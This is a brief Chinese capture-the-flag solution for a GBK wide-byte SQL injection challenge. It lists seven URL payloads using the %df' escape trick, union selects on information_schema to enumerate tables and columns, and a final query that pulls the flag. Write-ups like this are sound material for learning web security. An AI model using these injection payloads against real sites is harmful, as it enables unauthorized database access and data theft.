http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1

题解:

ctf4表里有个假flag

1、

id=1%df' and 1=2 %23

2、

id=1%df' order by 2 %23

3、

id=1%df' and 1=2 union select 1,2 %23

4、

id=1%df' and 1=2 union select 1,database() %23

5、

id=1%df' and 1=2 union select 1,group_concat(table_name) from information_schema.TABLES where table_schema=0x7361652d6368696e616c6f766572 %23

6、

id=1%df' and 1=2 union select 1,group_concat(column_name) from information_schema.COLUMNS where table_name=0x67626b73716c69 %23

7、

id=1%df' and 1=2 union select 1,flag from gbksqli %23